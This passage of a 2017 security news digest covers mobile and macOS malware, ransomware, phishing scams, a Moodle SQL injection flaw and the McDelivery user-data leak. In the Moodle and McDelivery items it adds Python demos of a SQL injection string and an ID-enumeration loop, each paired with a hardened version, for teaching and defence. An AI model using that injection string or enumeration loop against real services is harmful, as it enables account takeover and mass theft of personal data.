Furthermore, new variants of the Swearing Trojan were observed in the wild recently, along with a trend to use Aliyun and other cloud service hosted email accounts. Some of these email addresses are using a mobile number as their user name, and inconsistencies between these numbers and the actual mobile number used in SMS suggest that the Trojan variants are repackaged at least twice.

“Many mobile malware discovered in the Chinese market in the past, such as HummingBad, turned out to be early birds which continued to spread worldwide. The wide spread of the Swearing Trojan was achieved by using fake BTSs and automated phishing SMSs. Both of these threats can be adopted by western malware as well,” the researchers conclude.


Apple Computers Can Be Fully Controlled Remotely. A Malicious Program Signed with a Valid Apple Developer Certificate Makes It Possible
21.3.2017 Živě.cz Apple

Users of Apple computers face a threat in the form of malware called Proton. It exploits security holes in macOS and allows the computer to be controlled remotely, data to be read from it, or the machine to be locked. The malicious code can be hidden inside any application, which is then signed with a valid code-signing certificate. Apple Insider drew attention to the associated risks.

The malware exploits as yet unpatched vulnerabilities in macOS that grant administrator access to the computer, so practically all functions and data can be reached. It was written in Objective-C, the native language of macOS, and does not depend on any other software or libraries.

The most dangerous thing about the software is that it is signed with a valid certificate of a verified developer. Thanks to that it passes Apple's Gatekeeper check, which trusts Developer ID-signed applications, and at first it was not registered even by the built-in XProtect anti-malware protection. XProtect has since been updated and detects the malware in its last known form. Security experts warn, however, that modified versions may appear that evade the check again.

A tempting offer on a hacker forum (source: Sixgill)

The origin of the software was discovered by the security company Sixgill on a closed Russian discussion forum. There the author offered Proton packaged into any application "at the customer's request", charging at first 100 bitcoins (3.2 million CZK) for the service, later dropping to 40 bitcoins (1.3 million CZK) for an unlimited number of copies. Anyone wanting to target a single individual could pay 2 bitcoins for one installation.

Shortly after Sixgill published information about the source it had found, the page was removed. Whether this type of malware has already managed to spread in some way is not yet known.


Germany Fears Cyber Attacks During the Election Period

21.3.2017 Živě.cz BigBrother
Germany has raised the alert level of its security services against computer attacks. The German government took the decision in order to prepare for possible attacks of this kind during the upcoming parliamentary elections, the German newspaper Welt am Sonntag reported on Sunday.
Websites of government offices in Berlin are already targets of hackers. "We register attacks against government networks every day," the leadership of the Federal Office for Information Security (BSI) told the paper.

It did not specify the number or scope of the attacks, but their number has reportedly been rising since hackers interfered in last year's presidential election in the US.

Attacks Are Not Exceptional
Politically motivated cyber attacks are not as exceptional as they might seem at first glance. In recent weeks, for example, the server of the Austrian foreign ministry faced repeated attacks.

In the Austrian case the traces apparently lead to Turkey. Austrian foreign ministry spokesman Thomas Schnöll said earlier that minister Sebastian Kurz will not let the attacks deter him from his policy towards Turkey.

Relations between Vienna and Ankara have long been tense. Hundreds of thousands of Turks live in Austria, many of them with dual citizenship. Ankara's representatives are seeking support among them for proposed constitutional changes that would significantly strengthen the powers of Turkish president Recep Tayyip Erdogan.


Microsoft Will Block Updates for Older Windows on the Newest Hardware

21.3.2017 Živě.cz IT
Microsoft is preparing to enforce a new support policy for Windows 7 and Windows 8.1, and it is highly disadvantageous for users.

Personal computers powered by the latest processors from AMD, Intel and Qualcomm will be blocked from receiving security updates under Windows 7 and Windows 8.1, a revised Microsoft document concerning its update plans indicates.

"Your PC uses a processor that isn't supported on this version of Windows and you won't receive updates." That is roughly what the message such users receive will look like.

The error message is triggered when Windows 7 or Windows 8.1 attempts to fetch updates on devices with seventh-generation processors from Intel and AMD, i.e. Kaby Lake and Bristol Ridge, or with Qualcomm's Snapdragon 820 mobile processors.

Microsoft intends to support these processors only under Windows 10, states the Microsoft document describing the change in update policy.

Windows 8.1 and Windows 7 on devices with the processors listed above will not be able to scan for or download updates via Windows Update or Microsoft Update.

Microsoft foreshadowed changes in this area back in January 2016, when it stated that running Windows 7 and Windows 8.1 on the latest processors was "challenging". It subsequently decided to restrict these updates and also substantially shortened support for Windows 7 itself.

As for Intel's sixth-generation chips (Skylake), support was originally to be guaranteed only until the middle of this year, then for a year longer, and in the end the restriction on Skylake processors appears to be disappearing entirely, so the final date will be the same as the end of overall support for Windows 7 and Windows 8.1 respectively.

Some users take Microsoft's latest step rather badly and point out that the maker of the operating system should not concern itself with how "new" the hardware in people's computers is.

Ending Windows 7 and 8.1 support for the newest hardware is, in their view, all the more shocking because these operating systems are still sufficient for users' needs, so there is no reason to replace them with Windows 10.

Windows 7 will receive security updates until 14 January 2020, Windows 8.1 until 10 January 2023.


Cybercriminals target computers and mobiles alike. Only attentive users will spot the scams

21.3.2017 Novinky/Security Security
Smartphones, tablets and classic computers: cybercriminals now target all of these devices. Moreover, the number of attacks grows year after year. Users can defend themselves against many of them with various security applications. It is equally important, however, to stay alert while working on the internet.
The tricks of computer pirates are growing ever more sophisticated, and some malicious code can even block the operation of antivirus programs and firewalls. So if a user is fooled into downloading an uninvited guest onto their machine, the antivirus may not always warn them that something is wrong, simply because it has been blocked.

First and foremost, then, users themselves must be attentive so they do not unknowingly infect their own machine. It is also worth noting that caution is not warranted only for classic computers. Cybercriminals increasingly focus on mobiles and tablets as well, where most people give little thought to security.

Special programs can detect uninvited guests on a computer or a mobile. Besides classic antiviruses, these include, for example, applications that focus solely on spyware and on hunting for Trojan horses.

Updates are also very important, because it is precisely bugs in the operating system and in various programs that computer pirates very often exploit to smuggle uninvited guests into it. People should therefore not delay installing them.

It is also advisable to keep track of which tricks are currently in vogue among cybercriminals. That is what lets users stay a step ahead of computer pirates and minimize the chance of being fooled. Below is an overview of five scams that domestic users may have encountered recently.

We have a very important message
Computer pirates pose as bankers in unsolicited e-mails that have been circulating on the Czech internet in recent days. “You have a very important message in your mailbox. To view it, click the link below,” the cybercriminals claim in the fraudulent message. They try to create the impression that the e-mail was sent from Česká spořitelna.

The fraudsters are of course trying to make users click a link in the message that leads to a fake site imitating the Servis24 service, i.e. the savings bank's internet banking. If the gullible enter their login details on the fraudulent site, they give cybercriminals access to their account.

Moreover, immediately after the first login the criminals tell users that their account must be verified via an authorization SMS. If the gullible really do have it sent to their mobile phone and then copy it into the fraudulent page, they usually lose the money in their account right away, because revealing the SMS code is the same as serving the money to the attackers on a silver platter.

Your account needs to be verified
Cybercriminals pose as bankers in another scam as well, this time under the banner of Fio banka. They try to convince recipients of the unsolicited e-mail that their internet banking account must be verified.

More attentive users can tell it is a scam at first glance. The message is written in Czech, but very clumsily: “Dear customer, for security reasons we must verify own account information! For confirmation click here.”

The word “here” hides a link to a fraudulent website imitating the look of Fio banka's real internet banking. The clumsy word order is the first clue that users should not click the link in the e-mail at all.

Banking malware spreads via SMS
People should be wary of SMS messages from unknown sources. According to security experts, malicious code can spread through them. Cybercriminals are using the same tactic they tried in Germany at the end of January under the banner of banks. Back then they focused exclusively on users there. Now the threat has been localized into Czech as well and is spreading domestically.

How does the attack actually proceed? The incoming message contains a link to download a mobile application. At first glance it need not have anything to do with internet banking. “This dangerous malware masquerades as a supposed DHL application, which however downloads a fraudulent application named ‘Flash Player 10 Update’ with the DHL icon,” said Štefanko.

The problem is the very application the fraudsters promote via the SMS. It is a Trojan horse that, when internet banking is opened, slips in a fake login page.

Want a CZK 500 discount?
In yet another scam, cybercriminals abused SMS messages. A few weeks ago they posed as employees of the online shop Alza.cz and offered people discounts. In reality, however, they were only trying to smuggle malicious code into their smartphones.

The fraudsters are most often after money.
A discount? Better not...
“You have won a purchase worth CZK 500. If you place an order through our app within 12 hours, it will be completely free,” the fraudsters claim in the SMS messages. The incoming message also contains a direct link to download the Alza.cz app through which the transaction is supposed to take place. Only that way, supposedly, can people win.

In reality, the online shop is running no such promotion. “We are aware of fraudulent SMS messages posing as Alza.cz promotions,” the shop's representatives warned earlier. It cannot be ruled out, though, that computer pirates will try the same trick under the banner of a completely different company, so it is always advisable to verify any such discount with the company in question first.

Unintelligible scribbles
Last year the internet was literally flooded with fake discount offers and bargains. Cybercriminals often posed as merchants or representatives of some financial company, luring login credentials from the gullible or trying to infect their computers with a malicious virus. This year, however, they came up with a far more sophisticated scam. The user sees only bizarre scribbles.

Instead of fonts, the user installs a Trojan horse on their computer.
“A new trick to make users install malware has been observed. In this case the malware is distributed with the help of websites that display nonsensical characters,” said Pavel Bašta, security analyst at CSIRT.CZ.

Similar characters often appear, for example, in text documents when the font used is not installed on the computer. In practice, the user then has to install the character set manually to read the text.

And that is exactly what computer pirates are betting on. “If the user falls for the trick, their problems are only beginning, because instead of fonts they install a Trojan horse on their computer, or even the Spora ransomware,” the security analyst added, noting that users may encounter similar attacks even on legitimate websites that computer pirates manage to compromise.


According to the FBI, this GIF is a deadly weapon. Be careful who you send one to
21.3.2017 Živě.cz Security
It is not often that a tweet is the subject of a criminal investigation. But such cases do exist. In mid-December, Kurt Eichenwald, a journalist for Vanity Fair and Newsweek, was deliberately sent a tweet with a flashing GIF meant to trigger a seizure, because it is publicly known that he is epileptic. The FBI is now investigating the whole case and the sender has been arrested.
The tweet with the aggressively flashing GIF and the message “you deserve a seizure for your article” was sent by the user @jew_goldstein, and it really did cause Eichenwald a seizure. The journalist then announced he would take a break from Twitter and file a criminal complaint against the attacker. Three months later, the FBI detained the man who ran the @jew_goldstein account.

The flashing GIF really did cause the epileptic journalist a seizure. The star flickered stroboscopically between contrasting colors.

The attacker was 29-year-old John Rivello. He is charged with cyberbullying and, according to this court document, with assault with a deadly weapon. He allegedly sent the journalist the GIF because of his political views and because he is Jewish. The indictment also states that he urged other users to send the GIF to the man.

Rivello's iCloud account was used as evidence; in it investigators found links to Eichenwald's Wikipedia page and to the epilepsy website Epilepsy.com.


Even viruses are being stolen now. One ransomware uses a pirated copy of another
21.3.2017 Živě.cz Viruses

Security experts have uncovered a new type of extortion malware, PetrWrap, which encrypts personal data and demands a ransom to unlock it. What draws attention in particular is source code stolen from another ransomware by a rival group, Kaspersky Lab points out.
The authors of the Petya code, intended for building effective ransomware, offer it for distribution to other cybercriminal groups on the black market for a fee. They also added a control mechanism so it cannot be used without payment in “unauthorized” types of malware. But the PetrWrap authors managed to bypass that protection.

Analysts have observed the infiltration's unwanted activity only since the beginning of the year, and the question of how it spreads remains unanswered. “The creators use their own encryption keys, which differ from those Petya offers in its sold versions. That is also why they can operate entirely independently,” Kaspersky Lab reports.
From a technical standpoint, Petya and the viruses derived from it are today among the most serious threats. On a computer it encrypts data, overwrites the entire hard disk and prevents the operating system from loading.

In the past, researchers found a way to unlock affected files thanks to flaws in the cryptography, but the criminals fixed the shortcomings and created ransomware that remains unbroken to this day.


Searching for Leaked Celebrity Photos? Don't Blindly Click that Fappening Link!
21.3.2017 thehackernews  Privacy
Are you curiously googling or searching torrents for nude photos or videos of Emma Watson, Amanda Seyfried, Rose McGowan, or any other celebrities leaked in The Fappening 2.0?
If yes, then beware: you should not click any link promising Fappening celebrity photos.
Cybercriminals often take advantage of news headlines to trap victims and trick them into following links that may lead to websites containing malware or survey scams.
Last week, a few private photos of Emma Watson and Amanda Seyfried — ranging from regular selfies to explicitly sexual photos — were circulating on Internet forums, including Reddit and 4chan, with UK TV presenter Holly Willoughby and US actor Rose McGowan among the latest alleged victims.
Now, according to security researchers from Malwarebytes, scammers are exploiting this new batch of leaked celebrity photos and videos, using the stolen selfies to lure victims on social media sites and make money.
One of the scam campaigns uncovered by Malwarebytes targets Twitter users, promising that the mentioned links give access to leaked private photos of British WWE star Paige, whose intimate photos and videos, among other celebrities', were leaked online last week without her permission in an act dubbed "The Fappening 2.0."

The Fappening 2.0 is named after similar leaks in 2014 when some anonymous hackers flooded the Internet with private photographs of Jennifer Lawrence, Kim Kardashian, Kate Upton and many hundreds of other celebrities by hacking their Apple's iCloud accounts.
Don't Install Any App To View Leaked Fappening Images — It's Malware!
The latest scams spreading on Twitter read:
"VIDEO: WWE Superstar Paige Leaked Nude Pics and Videos"
"Incredible!!! Leaked Nude Pics and Videos of WWE Superstar Paige!!!!: [url] (Accept the App First)"
To access the content, the scammers tell you to first install a Twitter app called "Viral News." Hoping for a glimpse of Paige's nude video, victims are tricked into giving the malicious app permission to access their Twitter account, update their profile and post tweets on their behalf.
Once the app is installed, you are sent to a site that serves no purpose other than enabling crooks to make money from affiliate marketing and advertising link clicks.
The site quickly grays out, asking you to click yet another link that eventually lands you on a survey page promising an Amazon gift card as soon as you hand over your details.
"Suffice to say, filling this in hands your personal information to marketers – and there is no guarantee you will get any pictures at the end of it," said Chris Boyd, a malware intelligence analyst at Malwarebytes.
Malware Hijacks Twitter Accounts to Spread Fappening Spam

While you are looking through all these links, the creepy app spams the same tweets from your account, leading your followers to the same Fappening 2.0 scam you fell for.
So far nearly 7,000 users have fallen victim to the latest scam.
"As freshly leaked pictures and video of celebrities continue to be dropped online, so too will scammers try to make capital out of image-hungry clickers. Apart from the fact that these images have been taken without permission so you really shouldn’t be hunting for them, anyone going digging on less than reputable sites is pretty much declaring open season on their computers," Boyd concluded.
Here are some useful tips you can follow to protect yourself from scams shared through social media:
Don't take the bait. Stay away from promotions of "exclusive," "shocking" or "sensational" photos or footage. If it sounds too outlandish to be true, it is probably a scam.
Hover over links to see their real destination. Before you click on any link, mouse over it to see where it will take you. Do not click on links leading to unfamiliar sites.
Don't blindly trust your friends online. It might not actually be your friends who are liking or sharing scam links to photos. Their account may have been hijacked by scammers.
Raise your eyebrows when asked for something in return. Beware of any site that asks you to download and install software in order to view anything, in this case nude photos and videos of Paige. This is a known tactic for spreading scams.


US Bans Laptops, Tablets From Cabins on Flights From Middle East

21.3.2017 securityweek  Security
The United States warned Tuesday that extremists plan to target passenger jets with bombs hidden in electronic devices, and banned carrying them onto flights from 10 Middle East airports.

Senior US officials told reporters that nine airlines from eight countries had been given 96 hours, beginning at 3:00 am (0700 GMT), to ban devices bigger than a cellphone or smartphone from the cabin.

Laptops, tablets and portable game consoles are affected by the ban -- which applies to direct flights to the United States -- but they may still be stowed in the hold in checked baggage.

Passengers on approximately 50 flights per day from some of the busiest hubs in the Middle East, Turkey and North Africa will be obliged to follow the new emergency ruling.

"The restrictions are in place due to evaluated intelligence and we think it's the right thing to do and the right places to do it to secure the safety of the traveling public," one US official said.

The officials, speaking on condition of anonymity, refused to discuss the "intelligence information" that led the Transportation Security Administration to issue the order.

But one said that concerns had been "heightened by several successful events and attacks on passenger planes and airports over the last years."

No end date

The official would not go into detail about which attacks had raised fears, but did cite an incident from February of last year in which suspected Somali Islamists blew a hole in the side of Daallo Airlines passenger jet with a small device. Only the bomber was killed and the plane landed safely.

CNN quoted a US official as saying the ban was believed to be related to a threat posed by Al-Qaeda in the Arabian Peninsula, known as AQAP.

"Evaluated intelligence indicates that terrorist groups continue to target commercial aviation and are aggressively pursuing innovative methods to undertake their attacks, to include smuggling explosive devices in various consumer items," an official said.

The airports touched by the ban are Queen Alia International in Amman, Jordan; Cairo International in Egypt; Ataturk in Istanbul, Turkey; King Abdulaziz International in Jeddah, Saudi Arabia; King Khalid International in Riyadh, Saudi Arabia; Kuwait International; Mohammed V International in Casablanca, Morocco; Hamad International in Doha, Qatar; and the Dubai and Abu Dhabi airports in the United Arab Emirates.

No US carriers make direct flights from these airports, so they are unaffected by the ban, which will hit Royal Jordanian, EgyptAir, Turkish Airlines, Saudi Airlines, Kuwait Airways, Royal Air Maroc, Qatar Airways, Emirates and Etihad Airways.

The airlines and their host governments have already been informed of the order by US officials, and some of them have begun informing passengers about the restriction.

Airlines will be responsible for policing the cabin ban, and if they fail to do so could lose their rights to operate US routes.

No end date has been put on the order, and officials would not say whether the restriction might spread to other airports.


Cisco Patches Serious DoS Flaws in IOS

21.3.2017 securityweek  Vulnerability
Cisco has released updates for its IOS and IOS XE software to address a couple of high severity flaws that can be exploited to cause a denial-of-service (DoS) condition on vulnerable devices.

The security holes were disclosed on Monday by Omar Eissa, a researcher at Germany-based security firm ERNW, at the TROOPERS conference in a talk focusing on Cisco’s Autonomic Networking Infrastructure (ANI). The ANI vulnerabilities found by Eissa allow unauthenticated attackers to cause affected devices to reload.

One of the flaws, identified as CVE-2017-3850, can be exploited by a remote attacker simply by knowing the targeted Cisco device’s IPv6 address. The weakness can be exploited by sending a specially crafted IPv6 packet to an appliance, but the attack only works if the device runs a version of IOS that supports ANI and its IPv6 interface is reachable.

The second vulnerability, CVE-2017-3849, can be exploited if the targeted device is running an IOS release that supports ANI, it’s configured as an autonomic registrar, and it has a whitelist configured.

If these conditions are met, an adjacent attacker can cause a DoS condition by sending the appliance a specially crafted autonomic network channel discovery packet.

Cisco has published indicators of compromise (IoC) and the company’s IOS Software Checker can be used by customers to determine if their IOS and IOS XE software is vulnerable to such attacks. The networking giant has found no evidence of exploitation in the wild.

These are not the only serious IOS vulnerabilities disclosed recently by Cisco. Last week, the company informed customers that an analysis of the Vault 7 files made public this month by WikiLeaks revealed the existence of a critical remote code execution flaw affecting more than 300 of the company’s switches and modules.

In the Vault 7 files, which allegedly describe the CIA’s hacking capabilities, Cisco also identified a piece of malware that can hijack its devices and abuse them for various purposes, including data theft and manipulating web traffic.


Over 20 million Gmail and 5 million Yahoo accounts available for sale on the Dark Web
21.3.2017 securityaffairs Crime

A vendor with the online moniker “SunTzu583” is reportedly selling millions of login credentials for Gmail and Yahoo accounts on a black market on the dark web. Over 20 million Gmail accounts and 5 million Yahoo accounts are available for sale; the huge trove of data is the result of previous massive data breaches.

SunTzu583 is known to security experts and specializes in the sale of stolen login credentials.

A couple of weeks ago our colleagues at HackRead reported the sale of more than 1 million Gmail and Yahoo accounts by the same seller, and a few days later SunTzu583 started selling PlayStation accounts.

Dark web Playstation accounts

SunTzu583 offered 640,000 PlayStation accounts for USD 35.71 (0.0292 BTC); the dump includes e-mails and clear-text passwords.

SunTzu583 confirmed that the archive was not stolen directly from the PlayStation Network, but that it does contain unique accounts of PlayStation users. The seller added that even if the accounts may work for other web services, they are first of all PlayStation accounts.

Back to the present: the seller SunTzu583 is offering millions of Gmail accounts in separate listings.

In three different listings, he is offering 4,928,888 accounts.

“The total number of Gmail accounts being sold are 4,928,888 which have been divided into three different listings. All three listings contain 2,262,444 accounts including emails and their clear text passwords.” reports the analysis published by HackRead. “In the description of these listings, SunTzu583 has mentioned that “Not all these combinations work directly on Gmail, so don’t expect that all these email and passwords combinations work on Gmail.””

The researchers at HackRead, who compared the listings with the Hacked-DB and Have I Been Pwned repositories, confirmed that the data comes from past breaches including LinkedIn (117 million accounts), Adobe (153 million accounts) and the Bitcoin Security Forum (5 million Gmail passwords).

Dark Web Gmail

The vendor SunTzu583 is offering also another separate listing including additional 21,800,969 Gmail accounts that go for USD 450.48 (BTC 0.4673). According to the seller, 75% accounts contain decrypted passwords while 25% passwords are hashed. Upon scanning, HackRead can confirm that the data has been stolen from various data breaches including

Also in this case, HackRead confirmed that the data originates from various past breaches, including the Nulled.cr breach of May 2016, the MPGH.net breach and the Dropbox breach.

The seller is also allegedly offering 5,741,802 Yahoo accounts for $250 (0.2532 BTC).

Dark Web

Most of the accounts listed were not active, and the likely sources are the MySpace, Adobe and LinkedIn data breaches.

The dark web vendor warns buyers that not all the login credentials work.


FBI's Comey: From Clinton Bugbear to Thorn in Trump's Side?

21.3.2017 securityweek BigBrothers
Eight months ago, James Comey hampered Hillary Clinton's White House bid with a damning assessment of her email practices.

On Monday, the powerful FBI chief lobbed another bombshell into the world of US politics -- this time directed at the sitting president, Donald Trump.

In a high-stakes congressional hearing followed live by millions in America and around the world, Comey flatly rejected Trump's explosive claim that he was wiretapped by his predecessor Barack Obama.

Comey delivered his assessment without a blink, telling lawmakers neither the Federal Bureau of Investigation nor the Justice Department had evidence to support such allegations.

Intensely concentrated, with furrowed brow, the towering Comey -- he stands 6'8" (two meters) tall -- took the heat during a marathon first public hearing on the issue of Russian meddling in last year's election, and Trump's unsubstantiated allegations of wiretapping.

The 56-year-old projected the cool demeanor of a veteran public official throughout the marathon hearing, during which he confirmed for the first time that his agency is investigating Russia's alleged election interference and notably Moscow's possible collusion with Trump's campaign.

But the FBI chief, who has been in his post since September 2013, is also a highly-skilled political operator, who knows his words carry weight.

The Democrat Clinton learned that the hard way, when Comey called a surprise press conference last July to deliver a dressing-down over her use of a private email server that reverberated all the way to the November polls.

Comey angered Republicans by deciding not to press charges against the former secretary of state. But Clinton, to this day, believes that Comey's public berating of her, followed by a last-minute intervention resurrecting the controversy in October, cost her the election.

When Trump decided to keep the Obama appointee in his job, it raised eyebrows from critics who saw it as a tacit reward for the part he played in damaging Clinton's chances.

But the FBI chief increasingly looks to be a thorn in the president's side.

- Straight shooter -

Comey has now set his sights on the issue of Russian election meddling, which has stalked Trump's young presidency.

And if there is one character trait the FBI chief is known for, it is tenacity.

Comey locked horns relentlessly with Silicon Valley as he sought to convince Apple to unlock a smartphone used by the perpetrator of a terror attack in California. The FBI's own experts ended up breaking into the device.

Under Obama, Comey repeatedly stole the spotlight from his boss, former attorney general Loretta Lynch, who was reduced in the Clinton case to announcing she was following his advice not to press charges.

The burning-hot Clinton investigation -- which saw Comey assailed on all sides -- did much to cement his reputation as a straight shooter, as well as thrust him into the public eye.

But Comey has been circulating in political and legal circles at the highest level for three decades, giving him the confidence to challenge the country's justice department, and even the White House.

In the wake of the 2014 fatal police shooting of unarmed black teen Michael Brown in Ferguson, Missouri, Comey raised hackles by supporting cops who were wary of fulfilling their duties, for fear of their actions being caught on video.

- Independent -

Many top US government careers begin in New York, and Comey is no exception -- he hails from the Manhattan suburbs. He cut his teeth as a federal prosecutor in New York and the Washington area.

In 2003, the father-of-five became deputy attorney general.

The following year, he faced one of his toughest showdowns, confirming his reputation for being independent and unafraid.

Comey had become acting attorney general due to the illness of his boss John Ashcroft.

At Ashcroft's bedside, the presidential counsel to George W. Bush, Alberto Gonzales, was trying to persuade him to reauthorize a controversial warrantless eavesdropping program.

Comey -- who was against extending the program -- later revealed the incident to senators, unleashing a political firestorm.


Serious Flaws Found in Moodle Learning Platform

21.3.2017 securityweek Vulnerability
Researchers have discovered serious vulnerabilities in Moodle, a popular open-source learning platform used by many top universities in the United States, the United Kingdom and other countries around the world.

Moodle updates released last week address a total of four vulnerabilities, including two that have a “serious” severity/risk rating and two classified as “minor.”

One of the serious flaws, tracked as CVE-2017-2641, can be exploited by an attacker to execute arbitrary PHP code on a vulnerable Moodle server. While the security hole is tracked as a single issue, Netanel Rubin, the expert who discovered the problem, says an attack is possible due to several smaller weaknesses affecting the platform.

The flaw can be exploited by an authenticated attacker to conduct an SQL injection attack via user preferences and add a new administrator user to the system. Once the attacker has an admin account on the system, they can execute arbitrary code by uploading a new plugin or a template to the server, Rubin said.
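The root cause described above, untrusted preference data reaching the SQL text, is a general class of bug, so the following is an added illustration of that class rather than Moodle's code or Rubin's findings. It uses a constructed in-memory SQLite schema (a `user` table and a `user_preferences` table, both assumed for the example, not Moodle's real schema) and plays one hostile preference name through a string-formatted update and through a parameterized one.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory schema: two users and one preference row each.
    The table layout is an assumption for this example, not Moodle's schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, is_admin INTEGER)")
    conn.execute("CREATE TABLE user_preferences (userid INTEGER, name TEXT, value TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", [(1, "admin", 1), (2, "student", 0)])
    conn.executemany("INSERT INTO user_preferences VALUES (?, ?, ?)",
                     [(1, "theme", "boost"), (2, "theme", "boost")])
    conn.commit()
    return conn


def set_preference_vulnerable(conn: sqlite3.Connection, userid: int, name: str, value: str) -> None:
    """VULNERABLE: the caller-supplied preference name and value are pasted
    straight into the SQL text, so a quote in either one rewrites the query."""
    sql = "UPDATE user_preferences SET value = '%s' WHERE userid = %d AND name = '%s'" % (
        value, userid, name)
    conn.execute(sql)


def set_preference_hardened(conn: sqlite3.Connection, userid: int, name: str, value: str) -> None:
    """HARDENED: bound parameters keep the data outside the SQL grammar, so a
    quote or comment marker in the input is just text to compare against."""
    conn.execute("UPDATE user_preferences SET value = ? WHERE userid = ? AND name = ?",
                 (value, userid, name))


def get_preference(conn: sqlite3.Connection, userid: int, name: str):
    row = conn.execute("SELECT value FROM user_preferences WHERE userid = ? AND name = ?",
                       (userid, name)).fetchone()
    return row[0] if row else None


def run(setter) -> tuple:
    """Calls `setter` as the low-privileged user 2 with a hostile preference
    name and returns (admin's theme, student's theme) afterwards."""
    conn = make_db()
    student_id = 2
    # Constructed hostile input: closes the string literal, widens the WHERE
    # clause to the admin's row (id 1) and comments out the closing quote.
    hostile_name = "theme' OR userid = 1 --"
    setter(conn, student_id, hostile_name, "attacker-controlled")
    return get_preference(conn, 1, "theme"), get_preference(conn, 2, "theme")


if __name__ == "__main__":
    print("vulnerable:", run(set_preference_vulnerable))  # admin's row rewritten
    print("hardened:  ", run(set_preference_hardened))    # nothing matched, rows untouched
```

With the formatted query the `WHERE` clause becomes `userid = 2 AND name = 'theme' OR userid = 1`, which matches the admin's row as well; with the bound parameters the same string is compared literally against the `name` column and matches nothing. The write that crosses a user boundary is the building block the article's admin-creation step rests on, which is why the parameterized form, not input filtering, is the fix.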

This vulnerability affects Moodle 3.2 to 3.2.1, 3.1 to 3.1.4, 3.0 to 3.0.8, 2.7.0 to 2.7.18 and older versions, and it has been fixed with the release of versions 3.2.2, 3.1.5, 3.0.9 and 2.7.19.

Moodle developers noted that the flaw can only be exploited in Moodle versions prior to 3.2 by users with manager or admin rights. In version 3.2, the attack works with any type of user account, including teacher and student accounts.

Rubin, who recently warned that vulnerabilities in smart electricity meters expose consumers and electric utilities to cyberattacks, has published a lengthy blog post detailing his findings.

The second serious flaw patched by Moodle last week has been described as a cross-site scripting (XSS) flaw in the functionality that allows users to attach files for evidence of prior learning.

“Serving files attached to evidence of prior learning did not force download. When viewed by other users they would be opened in current moodle sessions,” Moodle wrote in its advisory.

The flaw, reported by a researcher who uses the online moniker “wez3” and tracked as CVE-2017-2645, only affects versions 3.2 to 3.2.1 and 3.1 to 3.1.4.

Jaymark Pestaño discovered a less severe XSS vulnerability in the evidence of prior learning section, and Nadav Kavalerchik identified an issue related to usernames being displayed in global search for unauthenticated users. Both issues are considered minor.


New Bill Forces Cybersecurity Responsibility Into the Boardroom

21.3.2017 securityweek Cyber

Cybersecurity Disclosure Act of 2017 Forces Cybersecurity Responsibility Into the Boardroom

The need for board-level responsibility for cyber security is generally accepted but not always applied. A new bill introduced to the Senate seeks to change this by requiring a board level statement of cyber security expertise or practice in annual SEC filings.

S536, cited as the 'Cybersecurity Disclosure Act of 2017', is sponsored by Democrats Mark Warner of Virginia and Jack Reed of Rhode Island, and Republican Susan Collins of Maine. Its purpose is to promote transparency in the oversight of cybersecurity risks at publicly traded companies.

The bill (PDF) defines a cyber security threat as any action not protected by the First Amendment that "may result in an unauthorized effort to adversely impact the security, availability, confidentiality, or integrity of an information system or information that is stored on, processed by, or transiting an information system..."

The bill then proposes just three requirements under the aegis of the Securities and Exchange Commission (SEC): that annual reports to the SEC must disclose the level of cyber security expertise of the board; or, if none exists, what "other cybersecurity steps taken by the reporting company were taken into account"; and that the definition of what constitutes that expertise should come from the SEC in consultation with NIST.

"It is in the best interest of consumers and shareholders for companies to fully disclose the plans they've set in place to defend against [data breaches]," Warner said in a statement announcing the legislation. "This legislation provides needed transparency in an often-shrouded process that directly affects the privacy of millions, and will serve as tool to urge other entities to follow through on establishing a reliable strategy to counter cyberattacks."

The effect of the bill will be to make the board legally and transparently responsible for cyber security. It is not the first regulation to seek this effect in 2017. On 1 March, the New York Department of Financial Services' 23 NYCRR 500 regulation came into force. That regulation imposes a responsibility for regulated organizations to name a 'CISO' who will provide an annual cyber security report to be submitted and signed off by the board to the regulator.

Taken together, these two examples of new regulations suggest that regulatory authorities are no longer satisfied to make recommendations about board-level security responsibility, but are now ready to mandate and legally require it.

The implication is that it is no longer sufficient that organizations should have security in the board, it will increasingly become a legal requirement.


McDonald's App Leaks Details of 2.2 Million Customers

21.3.2017 securityweek Incident
A vulnerable application used by millions of McDonald’s customers in India was recently found to leak personal information on its users.

Dubbed McDelivery, the web application was found to be leaking the personal information of over 2.2 million users. According to Fallible, the software security startup that discovered the bug, user data such as names, email addresses, phone numbers, home addresses, home co-ordinates, and social profile links were leaked by the application.

The issue, they reveal, resides in an unprotected, publicly accessible API endpoint designed to deliver user details, combined with serially enumerable integers used as customer IDs. Together, the two can be used to pull the personal information of all of the application's users.

“The mistake in this case was trivial and ought to have been fixed in a day at max. The app/website provides a facility to retrieve the current user details but does not check if the user ID being asked is the same user who has logged in. The user ID in this case is a plain number that starts from 1 and can be enumerated easily,” Abhishek Anand, Fallible co-founder, told SecurityWeek.
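The two defects Anand describes (no check that the requested ID belongs to the logged-in user, and IDs that are plain sequential integers) are easy to show side by side. The following is an added example and not the McDelivery code, which the page does not show; the user store, the handler signatures and the access-log format are all constructed for the illustration. It contrasts the unchecked lookup with an owner-checked one, shows what a walk over sequential IDs yields against each, and adds a small log check that flags sessions requesting many distinct user IDs.

```python
import re
from collections import defaultdict

# Constructed sample user store; stands in for the back-end database.
USERS = {
    1: {"name": "Alice Example", "email": "alice@example.com", "phone": "+91-00000-00001"},
    2: {"name": "Bob Example",   "email": "bob@example.com",   "phone": "+91-00000-00002"},
    3: {"name": "Cara Example",  "email": "cara@example.com",  "phone": "+91-00000-00003"},
}


def user_details_vulnerable(session_user_id: int, requested_id: int):
    """VULNERABLE: returns whichever record the caller asks for; the
    authenticated session is never consulted."""
    return USERS.get(requested_id)


def user_details_hardened(session_user_id: int, requested_id: int):
    """HARDENED: releases the record only to its authenticated owner.
    'Not yours' and 'no such user' return the same value, so the endpoint
    also stops confirming which IDs exist."""
    if requested_id != session_user_id:
        return None
    return USERS.get(requested_id)


def enumerate_ids(handler, session_user_id: int, id_range) -> list:
    """IDs for which `handler` returns a record to the given session; with
    sequential integer IDs this is what a simple counting loop recovers."""
    return [uid for uid in id_range if handler(session_user_id, uid) is not None]


# Constructed access-log excerpt: session s1 walks IDs 1..3, s2 is normal use.
SAMPLE_LOG = """\
sess=s1 GET /api/user/1 200
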